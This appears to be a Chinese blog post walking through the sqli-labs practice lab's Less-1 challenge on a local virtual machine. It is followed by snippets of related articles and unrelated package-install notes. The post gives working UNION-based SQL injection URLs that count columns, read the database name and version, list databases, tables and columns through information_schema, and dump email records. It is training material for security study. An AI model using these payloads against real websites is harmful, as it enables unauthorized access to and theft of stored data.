sql-libs(1) -字符型注入

最新推荐文章于 2022-12-31 20:08:48 发布
最新推荐文章于 2022-12-31 20:08:48 发布
阅读量227 收藏
点赞数
原文链接:http://www.cnblogs.com/kuaile1314/p/11324161.html
版权

关于sql-libs的安装就不做过多的说明,

环境:win7虚拟机 192.168.48.130(NAT连接),然后用我的win10物理机去访问。

 

直接加 ' 报错,后测试 and '1'='1 成功返回,1=2错误, 是基于字符型的注入

order by 3--+ 返回正常,  4的时候错误,得到字段为3,  --+是注释符号  http://192.168.48.130/sqli-labs-master/Less-1/?id=1' order by 3--+

 

查找当前数据库名称和版本号:http://192.168.48.130/sqli-labs-master/Less-1/?id=-1' union select 1,database(),version()--+

 

 

 查找所有数据库的名字 :http://192.168.48.130/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),version()--+

 

 

前面我们知道了,当前数据库是security,我们可以爆这个数据库下的所有表名,

语句: 

http://192.168.48.130/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()
),version()--+

 

当然,我们也可以查 mysql (0x6D7973716C) 数据库的所有表名,http://192.168.48.130/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x6D7973716C

),version()--+

 

上上图得到了emails的4个表名,假如我们想得到emails字段名,也用到16进制来进行编码, emails=0x656D61696C73 

http://192.168.48.130/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73

 

 

得到字段为 id 和email_id , 接下来就可以查看字段内容了 ,

http://192.168.48.130/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(id,0x3a,email_id) from emails
),version()--+

 

 

 

转载于:https://www.cnblogs.com/kuaile1314/p/11324161.html

weixin_30384217
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql-libs 手工注入步骤
m0_59035933的博客
08-13 1522
一.首先输入',发现有报错,很高兴的事情,说明有漏洞。 1.程序没有过滤特殊字符',提交的内容接过了sql引擎解析 2.回显的内容看到了MYSQL字样 二.输入:1’ or ‘1’=‘1 出现了大量信息,但是因为这一关的代码只能输出一组数据,所以看到的也只有一组数据 三.我们希望得到数据库的其他关键数据,所以要用到union联合查询。而联合查询的关键是需要知道主查询列数,因为联合查询需要和主查询的列数相同,不然会出现报错。所以我们使用ord...
e2fsprogs --> e2fsprogs-libs --> extundelete
02-14
安装顺序:e2fsprogs --> e2...tar -xf e2fsprogs-libs-1.41.14.tar.gz cd e2fsprogs-libs-1.41.14 ./configure make && make install cd .. tar -xf extundelete-0.2.4.tar.bz2 cd extundelete-0.2.4 ./configure
sqli-libs系列
qq_43511094的博客
12-31 1546
sqllibs information_schema中的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件 information_schema库中常用的表 schemate 这个表就很强,可以显示所有数据库的信息,注意,是数据库,不是表,show databases 就是从这个表中获取数据,schema_name就
渗透学习-SQL注入篇-场篇-Sql-lib详细的解决过程(1-65关的个人解决思路 2022.6.8 )
qq_43696276的博客
05-04 5056
在经过上一篇的sql基础学习后,以下将正式进入场的学习与训练当中。本文以下将进行对sql-libs场的学习,1-65关全攻略。
SQLLIBS场进阶(2)
ppbgi的博客
04-14 659
1—22关链接 二十三 将#、–+进行了处理 其他同上! 二十四 先进行账号的注册: 登录: 修改密码:初始密码123456 ,修改为234567 用修改的密码登录admin2: 二十五 或者 在尝试的时候,发现&&会报错,但是理论上来讲应该可以,所以用了|| 其他同上! ...
Windows下DVWA场和SQL-libs场搭建
waxcj的博客
04-25 5368
今天咱们来聊聊像网安小白比较适合的场环境,比较著名的有DVWA场和SQL-libs场等等。 DVWA场搭建简介 DVWA是一款基于PHP和mysql开发的web场练习平台,集成了常见的web漏洞如sql注入,xss,密码破解等常见漏洞;适合刚基础网络安全的小白。 1:PHPstudy安装 首先我们需要安装phpstudy(推荐是2018版本的,比较好用一点),安装好后我们启动phpstudy,如下图所示. 接下来我们在自己的浏览器中输入127.0.0.1这个IP地址,如果可以看到显示
krb5-libs-1.15.1-50.el7.x86_64.rpm
07-06
krb5-libs-1.15.1-50.el7.x86_64.rpm
kmod-libs-20-21.el7.x86_64.rar
05-13
标题 "kmod-libs-20-21.el7.x86_64.rar" 提供的是一款与Oracle 19C安装相关的软件包,它包括了 "kmod-20-21.el7.x86_64.rpm" 和 "kmod-libs-20-21.el7.x86_64.rpm" 两个组件。这些组件是针对Red Hat Enterprise ...
keyutils-libs-devel-1.5.8-3.el7.x86_64.rpm下载
08-07
linux系统,rpm资源keyutils-libs-devel-1.5.8-3.el7.x86_64.rpm, 适用于centos系统。
ubuntu 下安装32位库 ia32-libs方法
12-24
在64-bit机器上运行32-big的应用程序是,需要安装ia32-libs库 下载ia32-libs.tar.gz(下载地址:http://www.uuuwg.com/user/other/61NziUd2T) 接着对“ia32-libs.tar.gz” 进行解压,解压完成之后进入相应的目录...
sql_lib.zip
05-03
Flink SQL Client操作kafka、es、mysql时所需的jar文件,下载后放在flink目录下,在启动Flink SQL Client时通过-l参数指定
sqli_libs通关教程
qq_48904485的博客
03-22 5291
less-1 单引号联合注入 1、判断是字符还是数字 Id=2-1 与 id=2 结果相同就是字符 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xnvwRRTo-1647921807254)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-20211023110308434.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bmKZuH51-16479
搭建sql-libs的环境
qq_55777983的博客
04-15 1965
想学sql注入,但是搭建sql-libs不知道如何下手,可以看过来 1.准备工具 phpstudy:https://www.xp.cn sql-libs:https://github.com/Audi-1/sqli-labs 首先得下载好这两样东西,然后才能着手安装 2.想不出名字 安装完phpstudy,下载完sql-libs后,打开phpstudy,启动Apache和mysql 在phpstudy的软件管理中下载php5.x的版本(过高的版本后面安装sql-libs会不兼容,并不是越高越好) 3.解压
sqli-labs大详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入)GET - Error based - Intiger based (基于错误的GET整注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)Less-4 GET - Error based - Double Quotes
phpstduy下sql libs下载,安装教程。
qidiandexiaowu
03-02 1612
1.sql libs的下载。 sql libs的源代码地址:https://github.com/Audi-1/sqli-labs ,git进自己phpstduy文件夹的www文件夹内。 2.找到sql libs文件夹内的sql-connections。 找到db-creds.inc文本并打开,把里面的用户名和密码换成自己的,因为里面密码是空着的。 3.sql libs安装。 浏览器里输入ht...
SQL-LIBS 41-50通关过程
weixin_51387754的博客
10-20 461
sql-libs是github上的一个专注于sql注入的平台,目前网上关于这个平台的资源很多。
sqli-libs攻略入门(1-4)
shijianyoulei6的博客
06-30 2695
从根本上讲,当开发人员对用户的输入过滤不严,造成了用户可以通过输入SQL语句控制数据库,就会产生SQL注入漏洞。 为了省时间,快速的学习了解SQL注入,这里使用Windows sever 2008 R2+phpstudy环境 首先需要在源代码中添加这两个语句,使网页能够回显执行的有效sql语句 echo”有效输入”.$id.”<br>” echo”执行的sql语句”.$sql...
sqli-libs————Less2(数字注入
Fly_鹏程万里
05-08 1174
Less2同样,我们根据提示传入参数id,数据类为numeric加入单引号进行测试:爆出错误提示信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' ...
sqli-libs基础篇总结(1-22)
qq_33557485的博客
08-15 2420
1.关于sqli-labs 这个是sql注入场。可以在git上下载。 2.题目简介 前面的1-22题都是sql注入的基础题目。覆盖范围很广,不过都是针对mysql数据库的。 1-4题:union注入 5-8题:布尔盲注 9-10题:延时盲注 11-12题:post形式的显错注入 13-16题:post形式的布尔盲注 17题:update语句的显错注入 18-19题:htt...
卸载mariadb-libs
最新发布
04-17
要卸载mariadb-libs,可以按照以下步骤进行操作: 1. 打开终端或命令提示符窗口。 2. 输入以下命令以卸载mariadb-libs: - 在Debian或Ubuntu系统上: ``` sudo apt-get remove mariadb-libs ``` - 在CentOS或Fedora系统上: ``` sudo yum remove mariadb-libs ``` - 在Arch Linux系统上: ``` sudo pacman -R mariadb-libs ``` 3. 确认卸载操作,输入密码(如果需要)并按下回车键。 4. 等待卸载过程完成,这可能需要一些时间。 5. 检查是否成功卸载mariadb-libs,可以使用以下命令: - 在Debian或Ubuntu系统上: ``` dpkg -l | grep mariadb-libs ``` - 在CentOS或Fedora系统上: ``` rpm -qa | grep mariadb-libs ``` - 在Arch Linux系统上: ``` pacman -Qs mariadb-libs ``` 如果以上步骤执行成功,你应该能够确认mariadb-libs已经被成功卸载了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值